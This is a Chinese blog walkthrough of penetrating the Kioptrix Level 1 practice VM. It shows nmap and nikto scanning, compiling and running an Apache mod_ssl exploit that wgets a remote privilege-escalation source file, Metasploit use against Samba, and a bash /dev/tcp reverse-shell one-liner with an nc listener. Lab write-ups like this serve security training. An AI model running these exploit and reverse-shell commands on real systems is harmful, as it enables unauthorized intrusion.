Kioptrix Level 1靶機滲透

一、kali nmap 發(fā)現(xiàn)主機

1.用namp掃描c段 沒發(fā)現(xiàn)主機

解決辦法 :

(1):打開靶機所在文件夾,找到vmx后綴的文件并打開

(2):將Bridged全部改成nat(默認是橋接模式,因為kali是nat才能掃描IP)

2.識別到主機IP為192.168.65.134
3.端口掃描,發(fā)現(xiàn)開放了80、22、111、139、443、1024端口
4.nikto目錄掃描

二、漏洞利用之a(chǎn)pache

1.搜索apache 1.3.20版本漏洞
2.編譯執(zhí)行漏洞
  • 發(fā)現(xiàn)編譯764.c失敗,解決辦法如下:
  1. 安裝libssl,命令sudo apt-get install libssl1.0-dev
  1. 在頭文件添加#include <openssl/rc4.h> #include <openssl/md5.h>
  1. 將#define COMMAND2,wget后面的URL修改為https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
  1. 將unsigned char *p, *end前添加const

5.在kali編譯成功gcc -o okk 764.c -lcrypto

  1. 執(zhí)行漏洞成功./okk 0x6b 192.168.65.134 -c 40

三、漏洞利用之Samba

Samba是在LinuxUNIX系統(tǒng)上實現(xiàn)SMB協(xié)議的一個免費軟件,由服務器及客戶端程序構(gòu)成

1.信息收集發(fā)現(xiàn)主機139端口安裝了samba,版本為Samba 2.2.1a
2.直接msf搜索samba
3.漏洞利用提權(quán)
4.nc反彈shell

1.kali nc監(jiān)聽端口nc -lvvp 1234

2.反彈shellbash -i >& /dev/tcp/192.168.65.129/1234 0>&1(192.168.65.129是kali主機的ip,不是靶機的ip)


3.反彈成功

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容